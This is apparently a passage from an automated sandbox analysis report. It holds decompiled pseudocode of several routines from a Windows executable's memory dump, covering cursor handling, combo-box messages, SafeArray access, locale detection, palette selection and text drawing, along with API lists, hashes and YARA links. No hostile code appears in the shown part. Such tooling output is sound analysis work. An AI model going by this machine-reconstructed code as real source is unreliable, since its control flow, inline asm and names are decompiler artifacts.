					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x4bcb18;
						_t6 =  &_v24;
						 *_t6 =  *0x4bcb18 != 0;
						__eflags =  *_t6;
						 *0x4bcb18 = 2;
					} else {
						 *0x4bcb18 = 1;
						_v24 = 0;
					}
					_t54 =  *0x4bcafc; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x4bcafc; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x4bcafc; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x4bcafc; // 0x0
							E00446888( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x4bcafc; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E00444B50(2);
						_t121 =  *_t155;
						_t60 =  *0x4bcafc; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x4bcb1c != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x4bcb1c; // 0x0
								E0044F070(_t82, _t158);
								_t84 =  *0x4bcb1c; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x4bcb1c; // 0x0
									E0044F19C(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x4bcb1c; // 0x0
									E0044F0B4(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x4bcb1c; // 0x0
								E0044F210(_t91, _t131, __eflags);
								_t93 =  *0x4bb224; // 0x4bcb80
								SetCursor(E004653CC( *_t93, _t121, _t158));
							}
						}
						_t62 =  *0x4bb224; // 0x4bcb80
						_t65 = SetCursor(E004653CC( *_t62, _t121, _t158));
						if( *0x4bcb18 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00444B8C();
								_t67 =  *0x4bcafc; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E00446888(_t118,  &_v24, _t155);
									_t65 = E00403814(_t118, __eflags);
									_t135 =  *0x4bcafc; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x4bcafc; // 0x0
									_t65 = E00403814( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x4bcafc; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x4bcafc; // 0x0
								_t65 = E00403814( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x4bcafc == 0) {
								goto L32;
							} else {
								_t119 =  *0x4bcafc; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00408928(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x4bcafc; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x4bcafc; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x4bcafc; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E00444B50(1);
					if( *0x4bcafc == 0) {
						goto L32;
					}
					_t102 =  *0x4bcafc; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x4bcafc; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x4bcafc; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E00444B50(0);
					if( *0x4bcafc == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x4bcb08; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x4bcb14; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x4bcb0c; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x4bcb14; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

0x00444c32
0x00444c3b
0x00444c6a
0x00444c6a
0x00444c86
0x00444c8f
0x00444c91
0x00444c98
0x00444c9a
0x00444ca0
0x00444cad
0x00444cb2
0x00444cb2
0x00444c98
0x00444cb7
0x00444cc3
0x00444cd3
0x00444cda
0x00444cda
0x00444cda
0x00444cdf
0x00444cc5
0x00444cc5
0x00444ccc
0x00444ccc
0x00444ce6
0x00444cee
0x00444d3b
0x00444d3b
0x00444d42
0x00444d48
0x00444d4b
0x00444d54
0x00444d5c
0x00444d64
0x00444d69
0x00444d72
0x00444d79
0x00444d79
0x00444d87
0x00444d89
0x00444d8b
0x00444d95
0x00444d9e
0x00444da2
0x00444dac
0x00444db1
0x00444db6
0x00444dbb
0x00444dbf
0x00444dda
0x00444ddf
0x00444de4
0x00444dc1
0x00444dc5
0x00444dcc
0x00444dce
0x00444dd3
0x00444dd3
0x00444deb
0x00444deb
0x00444df0
0x00444df8
0x00444e05
0x00444e05
0x00444da2
0x00444e0d
0x00444e1a
0x00444e26
0x00444ef9
0x00444ef9
0x00444e2c
0x00444e2c
0x00444e2e
0x00444e4f
0x00444e51
0x00444e56
0x00444e59
0x00444e5b
0x00444e89
0x00444e98
0x00444e9d
0x00444ea3
0x00444e5d
0x00444e65
0x00444e71
0x00444e76
0x00444e7c
0x00444e7c
0x00444e30
0x00444e33
0x00444e36
0x00444e43
0x00444e43
0x00444ead
0x00000000
0x00444eaf
0x00444eaf
0x00444eb5
0x00444eb8
0x00444ec0
0x00444ec7
0x00000000
0x00000000
0x00444ece
0x00444ed0
0x00444ed7
0x00444ed7
0x00444eda
0x00444ee1
0x00444ee4
0x00444eef
0x00444ef0
0x00444ef1
0x00444ef2
0x00000000
0x00444ef2
0x00444ead
0x00444e26
0x00444cf2
0x00444cfe
0x00000000
0x00000000
0x00444d04
0x00444d09
0x00444d0c
0x00444d14
0x00444d17
0x00444d1e
0x00444d24
0x00444d29
0x00444d35
0x00000000
0x00000000
0x00000000
0x00444d35
0x00444c3d
0x00444c44
0x00444c49
0x00444c4f
0x00000000
0x00000000
0x00444c51
0x00444c59
0x00444c5c
0x00444c5e
0x00444c64
0x00000000
0x00000000
0x00000000

APIs

GetDesktopWindow.USER32 ref: 00444CA0
GetDesktopWindow.USER32 ref: 00444DC5
SetCursor.USER32(00000000), ref: 00444E1A

Part of subcall function 0044F210: 73F65F2B.COMCTL32(00000000,?,00444DF5), ref: 0044F22C
Part of subcall function 0044F210: ShowCursor.USER32 ref: 0044F247

SetCursor.USER32(00000000), ref: 00444E05

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$DesktopWindow$Show
String ID:
API String ID: 110329033-0
Opcode ID: 7e4f390cbc5c25a53cd77a3144c6afc00e5398946b701fc3d3fab7b1bc504652
Instruction ID: 475d32836423a9bd19355cb9e1264fc100bba4ff6c086f2094e3e4f87640bfd2
Opcode Fuzzy Hash: 7e4f390cbc5c25a53cd77a3144c6afc00e5398946b701fc3d3fab7b1bc504652
Instruction Fuzzy Hash: 8C919F75604246CFD314DF2AE8C5B0AB7E1BB89308F14C27AE844977A6C778EC45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043B820, Relevance: 6.1, APIs: 4, Instructions: 146
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0043B820(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v5;
				long _v12;
				char _v13;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t35;
				long _t37;
				void* _t47;
				void* _t67;
				void* _t68;
				long _t80;
				void* _t85;
				intOrPtr* _t95;
				intOrPtr _t106;
				void* _t123;
				intOrPtr _t129;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t123 = __edx;
				_t95 = __eax;
				_push(_t129);
				_push(0x43b9d5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				_t35 = E00404698(__edx);
				_t130 = _t35;
				if(_t35 != 0) {
					_t37 = E00404898(__edx);
					_v12 = SendMessageA(E0044D590(_t95), 0x14c, 0xffffffff, _t37);
					__eflags = _v12 - 0xffffffff;
					_v5 = _v12 != 0xffffffff;
					__eflags = _v5;
					if(_v5 != 0) {
						_t47 =  *((intOrPtr*)( *_t95 + 0xcc))();
						__eflags = _t47 - _v12;
						_v13 = _t47 != _v12;
						__eflags =  *((char*)(_t95 + 0x290));
						if( *((char*)(_t95 + 0x290)) != 0) {
							_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x23c)))) + 0x54))();
							__eflags = _t85 + 1;
							if(_t85 + 1 != 0) {
								SendMessageA(E0044D590(_t95), 0x14f, 0, 0);
							}
						}
						SendMessageA(E0044D590(_t95), 0x14e, _v12, 0);
						__eflags =  *((intOrPtr*)(_t95 + 0x276)) - 2;
						if( *((intOrPtr*)(_t95 + 0x276)) - 2 >= 0) {
							 *((intOrPtr*)( *_t95 + 0xd0))();
							E0040442C(_t95 + 0x270, _t123);
						} else {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x23c)))) + 0xc))( &_v24);
							_push(_v28);
							_t67 = E00404698(_t123);
							_pop(_t68);
							E004048F8(_t68, 0x7fffffff, _t67 + 1);
							E004046E4( &_v20, _v24, _t123);
							E00446D74(_t95, _t95, _v20, _t123);
							E00446D44(_t95,  &_v32);
							_push(E00404698(_v32));
							E00404698(_t123);
							_t80 = E004075BC();
							SendMessageA(E0044D590(_t95), 0x142, 0, _t80);
						}
						__eflags = _v13;
						if(__eflags != 0) {
							E00403814(_t95, __eflags);
							E00403814(_t95, __eflags);
						}
					}
				} else {
					_v5 = 0;
					 *((intOrPtr*)( *_t95 + 0xd0))();
					E00403814(_t95, _t130);
				}
				_pop(_t106);
				 *[fs:eax] = _t106;
				_push(0x43b9dc);
				E004043D8( &_v32);
				return E004043FC( &_v28, 3);
			}

0x0043b825
0x0043b826
0x0043b827
0x0043b828
0x0043b829
0x0043b82a
0x0043b82b
0x0043b82f
0x0043b831
0x0043b835
0x0043b836
0x0043b83b
0x0043b83e
0x0043b843
0x0043b848
0x0043b84a
0x0043b86f
0x0043b889
0x0043b88c
0x0043b890
0x0043b894
0x0043b898
0x0043b8a2
0x0043b8a8
0x0043b8ab
0x0043b8af
0x0043b8b6
0x0043b8c2
0x0043b8c5
0x0043b8c6
0x0043b8d9
0x0043b8d9
0x0043b8c6
0x0043b8f1
0x0043b8fc
0x0043b8fe
0x0043b983
0x0043b991
0x0043b900
0x0043b912
0x0043b918
0x0043b91b
0x0043b928
0x0043b929
0x0043b936
0x0043b940
0x0043b94a
0x0043b957
0x0043b95a
0x0043b960
0x0043b975
0x0043b975
0x0043b996
0x0043b99a
0x0043b9a2
0x0043b9ad
0x0043b9ad
0x0043b99a
0x0043b84c
0x0043b84c
0x0043b857
0x0043b863
0x0043b863
0x0043b9b4
0x0043b9b7
0x0043b9ba
0x0043b9c2
0x0043b9d4

APIs

SendMessageA.USER32 ref: 0043B884
SendMessageA.USER32 ref: 0043B8D9
SendMessageA.USER32 ref: 0043B8F1
SendMessageA.USER32 ref: 0043B975

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a38a1f5d8e0d92f452b63e7d7d64a10a33b3cb3e6b89bd11972649407dc2a24
Instruction ID: a3799fd380f08caab525c12342252af6b461e83baef9da14bd1fb1378edc882a
Opcode Fuzzy Hash: 5a38a1f5d8e0d92f452b63e7d7d64a10a33b3cb3e6b89bd11972649407dc2a24
Instruction Fuzzy Hash: 84418670B042445BDB00FB7ACC46B9EB7A9AF49314F10457AB914EB2C2DB7C9D06C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00410530, Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00410530(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E00410378(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F32C();
							E00410378(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F334();
							E00410378(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E004104D4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E004104A4(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040F35C();
						E00410378(_v780);
						E00410728(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040EEC0();
				return E00410378(_v776);
			}

0x0041053c
0x0041054c
0x00410553
0x00410553
0x0041055e
0x0041056c
0x0041057b
0x00410599
0x0041057d
0x00410588
0x00410588
0x004105a8
0x004105b4
0x004105b7
0x004105b9
0x004105ba
0x004105bc
0x004105c2
0x004105c4
0x004105d3
0x004105d4
0x004105de
0x004105df
0x004105e4
0x004105ef
0x004105f0
0x004105fa
0x004105fb
0x00410600
0x0041061b
0x0041061d
0x0041061e
0x00410621
0x00410621
0x004105c2
0x0041062a
0x0041062d
0x0041062f
0x00410630
0x00410636
0x0041063c
0x0041063e
0x00410640
0x00410643
0x00410646
0x00410646
0x00410649
0x00000000
0x00000000
0x00000000
0x00410649
0x00410649
0x00410650
0x0041065b
0x00410663
0x0041066a
0x00410671
0x00410672
0x00410677
0x00410682
0x00410682
0x00410690
0x00410694
0x0041069a
0x0041069b
0x004106ab

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004105DF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004105FB
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410672
VariantClear.OLEAUT32(?), ref: 0041069B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 00a0bc35264b4ba4ffeced68f91cb7649706495595b5674ac2242a0ee5001928
Instruction ID: 283d48e68f5a76c8e070f7de73831700d310a02d59f076832b492f97b2296d6e
Opcode Fuzzy Hash: 00a0bc35264b4ba4ffeced68f91cb7649706495595b5674ac2242a0ee5001928
Instruction Fuzzy Hash: FF413C75A0121D9FCB61DB59C880BC9B3FCAF48314F0041EAE548E7212DA78AFC08F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB0C, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DB0C() {
				char* _v28;
				char _v156;
				short _v414;
				signed short _t16;
				signed int _t18;
				int _t20;
				void* _t22;
				void* _t25;
				int _t26;
				int _t30;
				signed int _t34;
				signed int _t35;
				signed int _t36;
				signed int _t41;
				int* _t43;
				short* _t44;
				void* _t52;

				 *0x4bc744 = 0x409;
				 *0x4bc748 = 9;
				 *0x4bc74c = 1;
				_t16 = GetThreadLocale();
				if(_t16 != 0) {
					 *0x4bc744 = _t16;
				}
				if(_t16 != 0) {
					 *0x4bc748 = _t16 & 0x3ff;
					 *0x4bc74c = (_t16 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x4a010c, 0x40dc64, 8 << 2);
				if( *0x4a00c4 != 2) {
					_t18 = GetSystemMetrics(0x4a);
					__eflags = _t18;
					 *0x4bc751 = _t18 & 0xffffff00 | _t18 != 0x00000000;
					_t20 = GetSystemMetrics(0x2a);
					__eflags = _t20;
					_t35 = _t34 & 0xffffff00 | _t20 != 0x00000000;
					 *0x4bc750 = _t35;
					__eflags = _t35;
					if(__eflags != 0) {
						return E0040DA94(__eflags, _t52);
					}
				} else {
					_t22 = E0040DAF4();
					if(_t22 != 0) {
						 *0x4bc751 = 0;
						 *0x4bc750 = 0;
						return _t22;
					}
					E0040DA94(__eflags, _t52);
					_t41 = 0x20;
					_t25 = E00403140(0x4a010c, 0x20, 0x40dc64);
					_t36 = _t34 & 0xffffff00 | __eflags != 0x00000000;
					 *0x4bc750 = _t36;
					__eflags = _t36;
					if(_t36 != 0) {
						 *0x4bc751 = 0;
						return _t25;
					}
					_t26 = 0x80;
					_t43 =  &_v156;
					do {
						 *_t43 = _t26;
						_t26 = _t26 + 1;
						_t43 =  &(_t43[0]);
						__eflags = _t26 - 0x100;
					} while (_t26 != 0x100);
					_v28 =  &_v156;
					_t30 =  *0x4bc744; // 0x409
					GetStringTypeA(_t30, 2, _v28, 0x80,  &_v414);
					_t20 = 0x80;
					_t44 =  &_v414;
					while(1) {
						__eflags =  *_t44 - 2;
						_t41 = _t41 & 0xffffff00 |  *_t44 == 0x00000002;
						 *0x4bc751 = _t41;
						__eflags = _t41;
						if(_t41 != 0) {
							goto L17;
						}
						_t44 = _t44 + 2;
						_t20 = _t20 - 1;
						__eflags = _t20;
						if(_t20 != 0) {
							continue;
						} else {
							return _t20;
						}
						L18:
					}
				}
				L17:
				return _t20;
				goto L18;
			}

0x0040db18
0x0040db22
0x0040db2c
0x0040db36
0x0040db3d
0x0040db3f
0x0040db3f
0x0040db47
0x0040db53
0x0040db5f
0x0040db5f
0x0040db73
0x0040db7c
0x0040dc31
0x0040dc36
0x0040dc3b
0x0040dc42
0x0040dc47
0x0040dc49
0x0040dc4c
0x0040dc52
0x0040dc54
0x00000000
0x0040dc5c
0x0040db82
0x0040db82
0x0040db89
0x0040db8b
0x0040db92
0x00000000
0x0040db92
0x0040db9f
0x0040dbaf
0x0040dbb1
0x0040dbb6
0x0040dbb9
0x0040dbbf
0x0040dbc1
0x0040dbc3
0x00000000
0x0040dbc3
0x0040dbcf
0x0040dbd4
0x0040dbda
0x0040dbda
0x0040dbdc
0x0040dbdd
0x0040dbde
0x0040dbde
0x0040dbeb
0x0040dc00
0x0040dc06
0x0040dc0b
0x0040dc10
0x0040dc16
0x0040dc16
0x0040dc1a
0x0040dc1d
0x0040dc23
0x0040dc25
0x00000000
0x00000000
0x0040dc27
0x0040dc2a
0x0040dc2a
0x0040dc2b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040dc2b
0x0040dc16
0x0040dc63
0x0040dc63
0x00000000

APIs

GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040DC06
GetThreadLocale.KERNEL32 ref: 0040DB36

Part of subcall function 0040DA94: GetCPInfo.KERNEL32(00000000,?), ref: 0040DAAD

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: f85920185e767f2d17ba52d190d1d5b2c589a46a06caf4990fc8c9e9a7a4a679
Instruction ID: 7dfe8f0be98327da7fd701f5855bbdcde48a39931a3816f4e7dd18806b9bfddd
Opcode Fuzzy Hash: f85920185e767f2d17ba52d190d1d5b2c589a46a06caf4990fc8c9e9a7a4a679
Instruction Fuzzy Hash: CF312D21D483868BE710DBA99CC17A63794EB42304F1441BBE544AB3C6DFBC484DCB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0042C758, Relevance: 6.1, APIs: 4, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042C758(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				intOrPtr _t59;
				struct HDC__* _t69;
				void* _t70;
				intOrPtr _t79;
				void* _t84;
				struct HPALETTE__* _t85;
				intOrPtr _t87;
				intOrPtr _t89;

				_t87 = _t89;
				_push(_t70);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E004290B8(_v8);
					_push(_t87);
					_push(0x42c837);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					E0042DB68( *((intOrPtr*)(_v8 + 0x58)));
					E0042C5D4( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					E0042DC68( *((intOrPtr*)(_v8 + 0x58)));
					_t69 = CreateCompatibleDC(0);
					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t84 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
					}
					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
					if(_t85 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
						RealizePalette(_t69);
					}
					E0042955C(_v8, _t69);
					_t59 =  *0x4a08b8; // 0x1c40ae8
					E0041CB94(_t59, _t69, _t70, _v8, _t85);
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x42c83e);
					return E004293B0(_v8);
				}
			}

0x0042c759
0x0042c75b
0x0042c75e
0x0042c761
0x0042c768
0x0042c842
0x0042c76e
0x0042c771
0x0042c778
0x0042c779
0x0042c77e
0x0042c781
0x0042c78a
0x0042c79b
0x0042c7a6
0x0042c7b2
0x0042c7bd
0x0042c7c2
0x0042c7d8
0x0042c7c4
0x0042c7ce
0x0042c7ce
0x0042c7e4
0x0042c7e9
0x0042c807
0x0042c7eb
0x0042c7f7
0x0042c7fb
0x0042c7fb
0x0042c80f
0x0042c817
0x0042c81c
0x0042c823
0x0042c826
0x0042c829
0x0042c836
0x0042c836

APIs

Part of subcall function 004290B8: RtlEnterCriticalSection.KERNEL32(004BC8C4,00000000,00427B22,00000000,00427B81), ref: 004290C0
Part of subcall function 004290B8: RtlLeaveCriticalSection.KERNEL32(004BC8C4,004BC8C4,00000000,00427B22,00000000,00427B81), ref: 004290CD
Part of subcall function 004290B8: RtlEnterCriticalSection.KERNEL32(00000038,004BC8C4,004BC8C4,00000000,00427B22,00000000,00427B81), ref: 004290D6

Part of subcall function 0042DC68: GetDC.USER32(00000000), ref: 0042DCBE
Part of subcall function 0042DC68: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042DCD3
Part of subcall function 0042DC68: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042DCDD
Part of subcall function 0042DC68: CreateHalftonePalette.GDI32(00000000), ref: 0042DD01
Part of subcall function 0042DC68: ReleaseDC.USER32(00000000,00000000), ref: 0042DD0C

CreateCompatibleDC.GDI32(00000000), ref: 0042C7AD
SelectObject.GDI32(00000000,?), ref: 0042C7C6
SelectPalette.GDI32(00000000,?,000000FF), ref: 0042C7EF
RealizePalette.GDI32(00000000), ref: 0042C7FB

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: c291bec3cf8fd50d14d991b0c1a51525f64be2406a20fc89d9e7138dea2ecfb9
Instruction ID: 86336aa842a4a3c1bb486defafc39bd931e9607337606b8e8b9f822ac2bc106b
Opcode Fuzzy Hash: c291bec3cf8fd50d14d991b0c1a51525f64be2406a20fc89d9e7138dea2ecfb9
Instruction Fuzzy Hash: CB31F474B04664EFD704EB59D981D5DB3F5EF48310BA241A6E804AB362C738EE41DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0049C120, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0049C120(void* __eax, void* __ebx, int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12) {
				struct tagRECT _v20;
				int _t30;
				int _t43;
				void* _t51;
				intOrPtr _t58;
				CHAR* _t61;
				int _t64;
				void* _t67;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t64 = __ecx;
				_t51 = __eax;
				E00404888(_a12);
				_push(_t67);
				_push(0x49c1e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffff0;
				OffsetRect( &_v20, 1, 1);
				E00428490( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x160)) + 0xc)), _a4);
				_t30 = E00404698(_a12);
				_t61 = E00404898(_a12);
				DrawTextA(E004294DC( *((intOrPtr*)(_t51 + 0x160))), _t61, _t30,  &_v20, _t64);
				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
				E00428490( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x160)) + 0xc)), _a8);
				_t43 = E00404698(_a12);
				DrawTextA(E004294DC( *((intOrPtr*)(_t51 + 0x160))), _t61, _t43,  &_v20, _t64);
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(0x49c1ef);
				return E004043D8( &_a12);
			}

0x0049c12e
0x0049c12f
0x0049c130
0x0049c131
0x0049c132
0x0049c134
0x0049c139
0x0049c140
